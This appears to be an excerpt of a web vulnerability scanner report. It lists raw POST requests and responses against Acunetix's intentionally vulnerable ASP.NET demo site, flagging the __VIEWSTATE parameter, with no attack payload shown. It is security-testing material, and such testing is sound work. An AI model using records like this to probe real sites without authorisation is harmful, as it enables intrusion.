Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8526&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDA3NXETdsIZGRkLfoZQmYfsFSVGDwt4E7%2BYiS7bhE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKmm9adAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA6mrLHqg68EhYfHyk7650M1T%2Fge5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:50 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDA3NXETdsIZGRkLfoZQmYfsFSVGDwt4E7+YiS7bhE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKmm9adAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA6mrLHqg68EhYfHyk7650M1T/ge5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:White" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8530&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAg3%2FpUNsIZGRkMZ81PPJmNUaGP2YTqJmiKKa1IkA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA06ySAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA8oPhSk5JBeUjQH61ykA7MfTt6yn
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:29 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDAg3/pUNsIZGRkMZ81PPJmNUaGP2YTqJmiKKa1IkA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA06ySAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA8oPhSk5JBeUjQH61ykA7MfTt6yn" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:White" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
